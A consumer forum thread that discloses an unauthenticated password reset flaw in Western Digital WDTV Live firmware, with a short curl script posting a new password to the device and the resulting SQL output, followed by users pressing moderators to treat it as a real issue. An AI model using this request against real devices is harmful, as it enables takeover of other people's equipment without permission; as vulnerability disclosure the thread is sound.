Security: Password reset possible from internal LAN IP w/o authentication

doubleO8 · ‎06-17-2012

It is possible to set a new password for the web interface without further authentication. (One does not have to know the old web interface password to set a new password.)

A HTTP POST request to /DB/modfiy_pwd.php on WDTV Live will overwrite the web interface's password.

Example request using curl:

#!/bin/sh
#IP of WDTV Live:
WDTVLIVE=1.2.3.4
curl -d "password=bla" http://${WDTVLIVE}/DB/modfiy_pw.php

Output:

blaUPDATE web_password SET user_password_pw="bla" where user_id="1"1

Now you can login to the web interface using password 'bla'.

---

Firmware: 1.09.10 and lower
What hardware and media were you using? WDTV Live SMP (european)
Does it happen every time? sure.
Does it happen with previous firmware? yes.
Does power cycling the unit solve it? of course not.
Does resetting to factory defaults solve it? of course not.
Have you tried this on other devices? WDTVLive Hub

TonyPh12345 · ‎01-11-2010

Eeek!

Nasty.

===Live SMP / Live Hub x2 / Live+ / Live x2 / 24 TBytes of QNAP + WD NAS ===

doubleO8 · ‎06-17-2012

well, it's getting even better - stay tuned

I believe this is an "issue" rather than a "discussion topic" so would the moderators be so kind to move it back to http://community.wdc.com/t5/WD-TV-Live-Streaming-Issue/idb-p/streaming_issues !

TonyPh12345 · ‎01-11-2010

double--- You'll need to also complete all the other info needed to have the issue examined.

===Live SMP / Live Hub x2 / Live+ / Live x2 / 24 TBytes of QNAP + WD NAS ===

doubleO8 · ‎06-17-2012

"This is not an issue and should not be posted here." (permalink)

Bill_S, could you please elaborate why this security flaw is not an issue and where else one should post issues with Western Digital's Live SMP devices?

TonyPh12345 · ‎01-11-2010

I agree with double08: This is a real issue; the programming for passwords on the WDTV is insecure.

This means that anyone can change the password on the WDTV without needing to know the current password, and then can immediately access the Web UI and make changes without permission.

===Live SMP / Live Hub x2 / Live+ / Live x2 / 24 TBytes of QNAP + WD NAS ===

doubleO8 · ‎06-17-2012

*bump*

Security: Password reset possible from internal LAN IP w/o authentication

Re: Security: Password reset possible from internal LAN IP w/o authentication

Re: Security: Password reset possible from internal LAN IP w/o authentication

Re: Security: Password reset possible from internal LAN IP w/o authentication

Re: Bill_S' reply: Security: Password reset possible from internal LAN IP w/o authentication

Re: Bill_S' reply: Security: Password reset possible from internal LAN IP w/o authentication

Re: Bill_S' reply: Security: Password reset possible from internal LAN IP w/o authentication

Forums \| Ideas \| News and Announcements \| Register \| Sign in \| Help \| Forum Guidelines
Copyright © 2001 - 2010 Western Digital Corporation, All rights reserved. \| Trademarks \| Privacy \| Terms of Service \| Terms of Use \| Copyright \| Contact WD